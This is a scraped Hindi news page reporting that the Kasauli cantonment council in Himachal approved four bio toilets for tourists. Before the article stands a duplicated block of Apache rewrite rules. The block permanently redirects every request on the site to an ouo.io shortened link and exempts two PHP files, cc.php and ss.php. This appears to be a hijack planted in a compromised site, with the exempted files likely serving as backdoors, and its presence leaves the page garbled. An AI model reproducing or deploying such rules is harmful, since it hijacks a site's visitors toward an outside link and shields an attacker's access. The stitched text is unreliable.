
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 442
Nextगर्मी का मौसम हो और आपका कहीं आउटिंग पर जाने का मूड हो तो हिमाचल में कसौली से बेहतर तो कुछ और हो ही नहीं सकता। चारों तरफ हरियाली और देवदार के वृक्षों से लदे पहाड़ पर्यटकों का मन बरबस ही अपनी ओर खींच लेते हैं। वास्तव में यहां आकर मन एकदम खिल उठता है। अब तो हिमाचल सरकार ने भी पर्यटन को बढ़ावा देने के लिए पर्यटकों की सुविधाओं में इजाफा करने की ठान ली है। यही कारण है कि इस बार कसौली में पर्यटकों को ध्यान में रखते हुए बॉयो टॉयलेट की शुरूआत होने वाली है।
कसौली छावनी परिषद की बैठक में बॉयो टॉयलेट बनाने की पेशकश की गई है। बैठक में कसौली छावनी को सुंदर व स्वच्छ बनाने सहित सड़कों को दुरुस्त बनाने के लिए उपाध्यक्ष सहित सभी वार्ड पार्षदों ने चर्चा की। बैठक में पुराने विकास कार्यो को जल्द पूरा करने पर चर्चा की गई। बैठक में पर्यटन नगरी को स्वच्छ व पूर्ण रूप से खुला शौच मुक्त बनाने के लिए चर्चा की गई। इसके लिए शहर में चार नए बॉयो टॉयलेट लगाने पर मुहर लगी। छावनी को पहले ही पूर्ण रूप से खुला शौच मुक्त बनाया जा चुका है, जिसके लिए कसौली में आयोजित कार्यक्रम में रक्षा मंत्री निर्मला सीतारमण छावनी को ओडीएफ पुरस्कृत कर चुकी हैं। कसौली शहर में लोअर माल रोड, ईटावा, छोटा बस स्टैंड व आशा विला के नजदीक स्थानों पर बॉयो टॉयलेट लगाने के लिए भी निर्णय पास हुआ।